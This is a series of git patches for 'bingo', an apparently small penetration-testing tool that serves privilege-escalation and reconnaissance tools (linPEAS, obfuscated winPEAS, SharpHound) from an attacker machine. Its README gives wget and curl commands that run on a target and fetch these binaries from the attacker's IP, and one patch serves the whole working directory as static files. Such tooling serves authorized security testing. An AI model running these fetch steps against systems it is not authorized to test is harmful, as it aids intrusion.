From 573962afa68f4ceeeb93a99ee51c1486619314ef Mon Sep 17 00:00:00 2001 From: Rafael Date: Sat, 23 Apr 2022 17:42:13 -0300 Subject: [PATCH 1/7] Update sources for PEASS --- bingo.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/bingo.yaml b/bingo.yaml index 3cc37b6..4cf45ea 100644 --- a/bingo.yaml +++ b/bingo.yaml @@ -1,10 +1,10 @@ program: linpeas: - - url: "https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh" + - url: "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" - type: script - os: linux winpeas: - - url: "https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases/winPEASany.exe" + - url: "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" - type: binary - os: windows sharphound: From fe46aa69fc06457428e8ebb0e3d665df37df5800 Mon Sep 17 00:00:00 2001 From: Rafael Date: Tue, 14 Jun 2022 20:33:47 -0300 Subject: [PATCH 2/7] Add static folder --- bingo.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/bingo.py b/bingo.py index c48fd6f..f0bfb0f 100755 --- a/bingo.py +++ b/bingo.py @@ -18,7 +18,7 @@ except yaml.YAMLError as exc: print(exc) -app = Flask(__name__) +app = Flask(__name__, static_url_path='', static_folder=os.getcwd()) def search(parse, key_value): return parse[next((i for i,key in enumerate(parse) if key_value in key), None)].get(key_value) From 12004cea039f400e601971cc3e688529b5add012 Mon Sep 17 00:00:00 2001 From: zetsubcontent Date: Wed, 22 Nov 2023 20:09:18 -0300 Subject: [PATCH 3/7] Added more requirements --- requirements.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 0b85942..5121a76 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,3 +1,4 @@ pyyaml flask - +requests +netifaces From fdb98155989cce2cc04e248a59b9e6de06228674 Mon Sep 17 00:00:00 2001 From: zetsubcontent Date: Wed, 22 Nov 2023 20:10:59 -0300 Subject: [PATCH 4/7] Added install and use guides --- README.md | 38 +++++++++++++++++++++++++++++++++++++- 1 file changed, 37 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index eb4e699..1f447e6 100644 --- a/README.md +++ b/README.md @@ -1 +1,37 @@ -# bingo +# bingo - Penetration Testing Toolkit + +bingo facilitates the distribution and execution of essential tools for penetration testing, allowing the attacker to fetch them on the target machine without internet access on it. + +## Installation + +1. **Clone the Repository:** + ```bash + git clone https://github.com/luskabol/bingo.git + cd bingo + +2. **Install dependencies** + ```bash + pip install -r requirements.txt + +## Usage + +1. **On the attacker machine:** + ```bash + python3 bingo.py + ``` + +2. **On the target machine:** + ```bash + wget http://{your-internal-IP}:8000/get/{binary-name} -O {path-to-output-file} + ``` + + **If the target doesn't have wget:** + ```bash + curl http://{your-internal-IP}:8000/get/{binary-name} -o {path-to-output-file} + ``` + +- Replace {your-internal-IP} with the actal internal IP of the attacking machine. + +- Replace {binary-name} with the name of the binary you want to get, check `bingo.yaml` for available binaries. + +- Replace {path-to-output-file} with the location where you want to save the binary. From e28b77419d9382dd066ca057bcd8aa0c34497efd Mon Sep 17 00:00:00 2001 From: zetsubcontent Date: Wed, 22 Nov 2023 20:11:43 -0300 Subject: [PATCH 5/7] Updated to-do list --- todo.txt | 2 -- 1 file changed, 2 deletions(-) diff --git a/todo.txt b/todo.txt index 84a7b2c..b984f3e 100644 --- a/todo.txt +++ b/todo.txt @@ -1,3 +1 @@ -add a readme add more binaries -create an instalation guide From e2e7026698ae87afd25fc6929bc4eadfa6bc79e3 Mon Sep 17 00:00:00 2001 From: Luska <73140480+LuskaBol@users.noreply.github.com> Date: Wed, 22 Nov 2023 20:19:30 -0300 Subject: [PATCH 6/7] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1f447e6..c26c3bc 100644 --- a/README.md +++ b/README.md @@ -30,7 +30,7 @@ bingo facilitates the distribution and execution of essential tools for penetrat curl http://{your-internal-IP}:8000/get/{binary-name} -o {path-to-output-file} ``` -- Replace {your-internal-IP} with the actal internal IP of the attacking machine. +- Replace {your-internal-IP} with the attacker's machine IP. - Replace {binary-name} with the name of the binary you want to get, check `bingo.yaml` for available binaries. From 70f642129f95c2ba6ea04dabff6ac6469c465c27 Mon Sep 17 00:00:00 2001 From: snyk-bot Date: Mon, 6 May 2024 19:57:42 +0000 Subject: [PATCH 7/7] fix: requirements.txt to reduce vulnerabilities The following vulnerabilities are fixed by pinning transitive dependencies: - https://snyk.io/vuln/SNYK-PYTHON-WERKZEUG-6808933 --- requirements.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/requirements.txt b/requirements.txt index 5121a76..55d4c8a 100644 --- a/requirements.txt +++ b/requirements.txt @@ -2,3 +2,4 @@ pyyaml flask requests netifaces +werkzeug>=3.0.3 # not directly required, pinned by Snyk to avoid a vulnerability